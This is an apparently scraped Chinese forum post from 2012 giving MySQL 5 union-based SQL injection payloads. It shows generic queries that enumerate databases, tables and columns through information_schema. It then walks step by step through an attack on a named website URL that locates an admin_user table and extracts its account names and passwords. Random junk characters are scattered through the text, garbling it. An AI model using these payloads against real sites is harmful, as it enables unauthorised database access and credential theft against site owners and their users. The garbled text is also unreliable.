查库) s+ }$ @5 |# j1 c# R7 V! O
7 _: v9 s1 p, U& T5 E+ n5 G) l) F
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
4 B: C+ V& p& i, T7 Y
0 m7 }% ^' s; V查表9 z; Y& X% Z' c. Q* W2 g2 s
3 Z7 ~9 a& k! [
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
7 L% L* `2 y) w( \0 o$ a
/ e) C, K4 ~/ `, x! `/ {0 _4 m查段
5 e- l P% y$ a% M* I; z( B0 k5 T' ~' T: V. O z. Z
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1- v4 G% K3 V9 b; R2 S
! Z6 d7 @; m4 a. t- h* z* n
' a& E# o; i/ Q7 \( O+ Q+ ]
mysql5高级注入方法暴表
: |' e0 l- P7 c4 e( [4 J9 G3 x+ H: C" S( Y
例子如下:
# }2 k% z. Y# F# y- H! f/ E
! C6 y" G' B. J4 n1.爆表
$ M# d! Z% H- M8 k5 _9 lhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
. o2 Z- \! K9 b/ z这样爆到第4个时出现了admin_user表。5 b7 @# ~6 G" w& T- q/ f
; d( O2 D2 ]- f2 V1 W2.暴字段
3 }1 c% n. u* k2 y6 T. _5 \& Zhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
$ M, v i' Y6 x9 y& G: H3 I9 a0 G" @: [
: n, M% H+ O f. I Z8 g$ I! C) Y% r
3.爆密码
/ J* i& r: y/ B, Xhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* 3 v5 j; W+ o: R1 a
* P5 E( l* n! \( j: o0 f' P* ^% L1 F: S6 P" \
|
发表于 2012-9-13 16:29:37
收藏
支持
反对